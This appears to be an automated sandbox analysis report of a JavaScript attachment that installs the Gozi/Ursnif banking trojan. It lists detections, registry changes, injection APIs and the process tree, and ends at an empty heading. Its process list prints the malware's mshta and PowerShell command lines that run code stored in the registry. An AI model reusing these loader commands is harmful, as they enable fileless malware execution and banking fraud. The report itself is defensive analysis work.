Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5664, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4052, type: MEMORY

E-Banking Fraud:

barindex
Detected Gozi e-Banking trojanShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ff3_2_0514FB8F
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: lstrlen,RtlAllocateHeap,mbstowcs,lstrcatW,HeapFree,RtlAllocateHeap,lstrcatW,HeapFree,CreateDirectoryW,DeleteFileW,HeapFree,HeapFree, \cookie.ie3_2_0514FB8F
Yara detected UrsnifShow sources
Source: Yara matchFile source: 00000003.00000003.974215448.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000014.00000002.1187145561.000001C7D569E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1010236467.0000000004F5B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000002.1158916557.000001337413E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000002.1164687084.0000000005130000.00000040.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974824363.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974371336.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974507500.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974637108.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000003.1101073762.0000025430CB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000012.00000003.1154798973.00000133741C0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 0000000F.00000002.1156601270.0000000000C3E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974737633.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974879691.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.1091761410.00000000008E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000003.00000003.974931290.00000000050D8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1836, type: MEMORY
Source: Yara matchFile source: Process Memory Space: control.exe PID: 3720, type: MEMORY
Source: Yara matchFile source: Process Memory Space: rundll32.exe PID: 5664, type: MEMORY
Source: Yara matchFile source: Process Memory Space: RuntimeBroker.exe PID: 4052, type: MEMORY
Disables SPDY (HTTP compression, likely to perform web injects)Show sources
Source: C:\Windows\explorer.exeRegistry key value created / modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings EnableSPDY3_0 0

System Summary:

barindex
Writes or reads registry keys via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Writes registry values via WMIShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\SysWOW64\regsvr32.exeWMI Registry write: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Contains functionality to call native functionsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_051375B3 NtOpenProcess,NtOpenProcessToken,NtQueryInformationToken,NtQueryInformationToken,NtQueryInformationToken,memcpy,NtClose,NtClose,3_2_051375B3
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05135CD8 memcpy,memcpy,memcpy,NtUnmapViewOfSection,memset,3_2_05135CD8
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0513476B RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,3_2_0513476B
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0513668C NtMapViewOfSection,3_2_0513668C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0514CEA7 GetSystemTimeAsFileTime,HeapCreate,NtQueryInformationThread,GetModuleHandleA,RtlExitUserThread,3_2_0514CEA7
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05150170 NtWow64ReadVirtualMemory64,GetProcAddress,NtWow64ReadVirtualMemory64,3_2_05150170
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0514A395 GetProcAddress,NtWow64QueryInformationProcess64,StrRChrA,3_2_0514A395
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_051493CD NtWriteVirtualMemory,NtWriteVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_051493CD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05148A30 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,3_2_05148A30
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0514CA3E GetProcAddress,NtCreateSection,memset,3_2_0514CA3E
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0514A27A NtQueryInformationProcess,3_2_0514A27A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_051402DF NtAllocateVirtualMemory,NtAllocateVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_051402DF
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05134D66 OpenProcess,GetLastError,GetProcAddress,NtSetInformationProcess,RtlNtStatusToDosError,GetProcAddress,GetProcAddress,TerminateThread,ResumeThread,CloseHandle,GetLastError,CloseHandle,3_2_05134D66
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0514C7BD NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,LdrInitializeThunk,LdrInitializeThunk,lstrcpyW,3_2_0514C7BD
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05147933 NtReadVirtualMemory,RtlNtStatusToDosError,SetLastError,3_2_05147933
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05144968 memset,memcpy,LdrInitializeThunk,NtSetContextThread,RtlNtStatusToDosError,GetLastError,3_2_05144968
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0513A99C NtGetContextThread,RtlNtStatusToDosError,3_2_0513A99C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0514B07A NtQuerySystemInformation,RtlNtStatusToDosError,3_2_0514B07A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_051473D6 memset,NtQueryInformationProcess,3_2_051473D6
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05148A15 memset,NtWow64QueryInformationProcess64,GetProcAddress,NtWow64QueryInformationProcess64,3_2_05148A15
Source: C:\Windows\System32\control.exeCode function: 15_2_00C071CC RtlAllocateHeap,NtSetContextThread,NtUnmapViewOfSection,NtClose,15_2_00C071CC
Source: C:\Windows\System32\control.exeCode function: 15_2_00C24AD0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,15_2_00C24AD0
Source: C:\Windows\System32\control.exeCode function: 15_2_00C08AD8 NtSetInformationProcess,CreateRemoteThread,ResumeThread,FindCloseChangeNotification,FindCloseChangeNotification,15_2_00C08AD8
Source: C:\Windows\System32\control.exeCode function: 15_2_00C19310 NtReadVirtualMemory,15_2_00C19310
Source: C:\Windows\System32\control.exeCode function: 15_2_00C0ECE0 NtQueryInformationProcess,15_2_00C0ECE0
Source: C:\Windows\System32\control.exeCode function: 15_2_00C24C24 NtAllocateVirtualMemory,15_2_00C24C24
Source: C:\Windows\System32\control.exeCode function: 15_2_00C22DC0 NtQueryInformationProcess,15_2_00C22DC0
Source: C:\Windows\System32\control.exeCode function: 15_2_00C065E8 NtMapViewOfSection,15_2_00C065E8
Source: C:\Windows\System32\control.exeCode function: 15_2_00C105B8 NtWriteVirtualMemory,15_2_00C105B8
Source: C:\Windows\System32\control.exeCode function: 15_2_00C04748 NtCreateSection,15_2_00C04748
Source: C:\Windows\System32\control.exeCode function: 15_2_00C41004 NtProtectVirtualMemory,NtProtectVirtualMemory,15_2_00C41004
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374124AD0 NtQueryInformationToken,NtQueryInformationToken,NtClose,NtClose,18_2_0000013374124AD0
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374122DC0 NtQueryInformationProcess,18_2_0000013374122DC0
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374141004 NtProtectVirtualMemory,NtProtectVirtualMemory,18_2_0000013374141004
Contains functionality to launch a process as a different userShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_051393F0 CreateProcessAsUserA,3_2_051393F0
Detected potential crypto functionShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05156D183_2_05156D18
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05151D5A3_2_05151D5A
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_051515703_2_05151570
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05136F343_2_05136F34
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0513CF553_2_0513CF55
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_051427783_2_05142778
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05143F8C3_2_05143F8C
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_051526133_2_05152613
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05142EDE3_2_05142EDE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_051410DE3_2_051410DE
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_0513DB4A3_2_0513DB4A
Source: C:\Windows\System32\control.exeCode function: 15_2_00C071CC15_2_00C071CC
Source: C:\Windows\System32\control.exeCode function: 15_2_00C279AC15_2_00C279AC
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2555015_2_00C25550
Source: C:\Windows\System32\control.exeCode function: 15_2_00C158F415_2_00C158F4
Source: C:\Windows\System32\control.exeCode function: 15_2_00C0C85015_2_00C0C850
Source: C:\Windows\System32\control.exeCode function: 15_2_00C0682C15_2_00C0682C
Source: C:\Windows\System32\control.exeCode function: 15_2_00C011A015_2_00C011A0
Source: C:\Windows\System32\control.exeCode function: 15_2_00C0D9B015_2_00C0D9B0
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2F94415_2_00C2F944
Source: C:\Windows\System32\control.exeCode function: 15_2_00C0D17815_2_00C0D178
Source: C:\Windows\System32\control.exeCode function: 15_2_00C0812815_2_00C08128
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2DA9415_2_00C2DA94
Source: C:\Windows\System32\control.exeCode function: 15_2_00C0A2B415_2_00C0A2B4
Source: C:\Windows\System32\control.exeCode function: 15_2_00C02AB515_2_00C02AB5
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2AA0C15_2_00C2AA0C
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2F21415_2_00C2F214
Source: C:\Windows\System32\control.exeCode function: 15_2_00C1F3CC15_2_00C1F3CC
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2B3F015_2_00C2B3F0
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2DB9015_2_00C2DB90
Source: C:\Windows\System32\control.exeCode function: 15_2_00C13B9415_2_00C13B94
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2935815_2_00C29358
Source: C:\Windows\System32\control.exeCode function: 15_2_00C1231815_2_00C12318
Source: C:\Windows\System32\control.exeCode function: 15_2_00C09B3415_2_00C09B34
Source: C:\Windows\System32\control.exeCode function: 15_2_00C12C5815_2_00C12C58
Source: C:\Windows\System32\control.exeCode function: 15_2_00C1BC5C15_2_00C1BC5C
Source: C:\Windows\System32\control.exeCode function: 15_2_00C17C7015_2_00C17C70
Source: C:\Windows\System32\control.exeCode function: 15_2_00C0B47415_2_00C0B474
Source: C:\Windows\System32\control.exeCode function: 15_2_00C26C2C15_2_00C26C2C
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2CD4815_2_00C2CD48
Source: C:\Windows\System32\control.exeCode function: 15_2_00C10D0815_2_00C10D08
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2A52015_2_00C2A520
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2E52015_2_00C2E520
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2BECC15_2_00C2BECC
Source: C:\Windows\System32\control.exeCode function: 15_2_00C25EFC15_2_00C25EFC
Source: C:\Windows\System32\control.exeCode function: 15_2_00C0FE8815_2_00C0FE88
Source: C:\Windows\System32\control.exeCode function: 15_2_00C22EBC15_2_00C22EBC
Source: C:\Windows\System32\control.exeCode function: 15_2_00C1CE4015_2_00C1CE40
Source: C:\Windows\System32\control.exeCode function: 15_2_00C28E4015_2_00C28E40
Source: C:\Windows\System32\control.exeCode function: 15_2_00C0264415_2_00C02644
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2FE6015_2_00C2FE60
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2DFC415_2_00C2DFC4
Source: C:\Windows\System32\control.exeCode function: 15_2_00C1FFF015_2_00C1FFF0
Source: C:\Windows\System32\control.exeCode function: 15_2_00C06F8415_2_00C06F84
Source: C:\Windows\System32\control.exeCode function: 15_2_00C307B815_2_00C307B8
Source: C:\Windows\System32\control.exeCode function: 15_2_00C2873C15_2_00C2873C
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000133741279AC18_2_00000133741279AC
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412555018_2_0000013374125550
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374125EFC18_2_0000013374125EFC
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412873C18_2_000001337412873C
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374106F8418_2_0000013374106F84
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412DFC418_2_000001337412DFC4
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000133741307B818_2_00000133741307B8
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337411FFF018_2_000001337411FFF0
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337410682C18_2_000001337410682C
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337410C85018_2_000001337410C850
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000133741158F418_2_00000133741158F4
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337410812818_2_0000013374108128
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412F94418_2_000001337412F944
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337410D17818_2_000001337410D178
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337410D9B018_2_000001337410D9B0
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000133741011A018_2_00000133741011A0
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_00000133741071CC18_2_00000133741071CC
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412AA0C18_2_000001337412AA0C
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412F21418_2_000001337412F214
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412DA9418_2_000001337412DA94
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337410A2B418_2_000001337410A2B4
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374102AB518_2_0000013374102AB5
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337411231818_2_0000013374112318
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374109B3418_2_0000013374109B34
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412935818_2_0000013374129358
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412DB9018_2_000001337412DB90
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374113B9418_2_0000013374113B94
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337411F3CC18_2_000001337411F3CC
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412B3F018_2_000001337412B3F0
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374126C2C18_2_0000013374126C2C
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374117C7018_2_0000013374117C70
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374112C5818_2_0000013374112C58
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337411BC5C18_2_000001337411BC5C
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337410B47418_2_000001337410B474
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374110D0818_2_0000013374110D08
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412E52018_2_000001337412E520
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412A52018_2_000001337412A520
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412CD4818_2_000001337412CD48
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337410264418_2_0000013374102644
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337411CE4018_2_000001337411CE40
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374128E4018_2_0000013374128E40
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412FE6018_2_000001337412FE60
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337410FE8818_2_000001337410FE88
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_000001337412BECC18_2_000001337412BECC
Source: C:\Windows\System32\rundll32.exeCode function: 18_2_0000013374122EBC18_2_0000013374122EBC
Java / VBScript file with very long strings (likely obfuscated code)Show sources
Source: view_attach_b8x.jsInitial sample: Strings found which are bigger than 50
Searches for the Microsoft Outlook file pathShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Tries to load missing DLLsShow sources
Source: C:\Windows\System32\regsvr32.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: sfc.dllJump to behavior
Classification labelShow sources
Source: classification engineClassification label: mal100.phis.bank.troj.spyw.evad.winJS@21/18@11/1
Contains functionality to enum processes or threadsShow sources
Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_05146887 CloseHandle,LdrInitializeThunk,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,3_2_05146887
Creates files inside the user directoryShow sources
Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
Creates mutexesShow sources
Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{0FE5ED0C-228F-19C4-A4B3-765D18970AE1}
Source: C:\Windows\System32\rundll32.exeMutant created: \Sessions\1\BaseNamedObjects\{C7D7CCCD-7A32-911F-BCEB-4E55B04F6259}
Source: C:\Windows\SysWOW64\regsvr32.exeMutant created: \Sessions\1\BaseNamedObjects\{63DD0252-66A3-8DE3-8847-FA113C6BCED5}
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3920:120:WilError_01
Creates temporary filesShow sources
Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\pJYlRpQA.LuPFLJump to behavior
Parts of this applications are using the .NET runtime (Probably coded in C#)Show sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b818384f6f636b55ba6f5af0c6a7784d\mscorlib.ni.dll
Reads ini filesShow sources
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Reads software policiesShow sources
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Runs a DLL by calling functionsShow sources
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Sample is known by AntivirusShow sources
Source: view_attach_b8x.jsVirustotal: Detection: 25%
Source: view_attach_b8x.jsReversingLabs: Detection: 21%
Sample might require command line argumentsShow sources
Source: regsvr32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Spawns processesShow sources
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\view_attach_b8x.js'
Source: unknownProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\iUBu.txt
Source: unknownProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\iUBu.txt
Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:17410 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:17420 /prefetch:2
Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:82958 /prefetch:2
Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'
Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?
Source: unknownProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\regsvr32.exe 'C:\Windows\System32\regsvr32.exe' -s C:\Users\user\AppData\Local\Temp\\iUBu.txtJump to behavior
Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s C:\Users\user\AppData\Local\Temp\\iUBu.txtJump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\AppDataLow\\Software\\Microsoft\\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9\\Analager'));if(!window.flag)close()</script>'Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe /?Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:17410 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:17420 /prefetch:2Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6020 CREDAT:82958 /prefetch:2Jump to behavior
Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\27F8DA9B-5A17-F1FE-9C4B-2EB590AF42B9').BingckDS))Jump to behavior
Source: C:\Windows\System32\control.exeProcess created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL /?
Uses an in-process (OLE) Automation serverShow sources
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{f414c260-6ac0-11cf-b6d1-00aa00bbbb58}\InprocServer32Jump to behavior
Reads internet explorer settingsShow sources
Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Uses Microsoft SilverlightShow sources
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Submission file is bigger than most known malware samplesShow sources
Source: view_attach_b8x.jsStatic file information: File size 3550402 > 1048576
Uses new MSVCR DllsShow sources
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_171\bin\msvcr100.dllJump to behavior
Binary contains paths to debug symbolsShow sources
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000010.00000000.1133425764.0000000007010000.00000002.00000001.sdmp
Source: Binary string: c:\Ever\Knew\Experiment\poem\Base\Posepath.pdb source: wscript.exe, 00000000.00000003.833057642.000001DFAC936000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdb source: regsvr32.exe, 00000003.00000003.1097720153.0000000005940000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: regsvr32.exe, 00000003.00000003.1097720153.0000000005940000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000000F.00000002.1162697674.0000025432BBC000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000000F.00000002.1162697674.0000025432BBC000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000010.00000000.1133425764.0000000007010000.00000002.00000001.sdmp

Data Obfuscation:

barindex
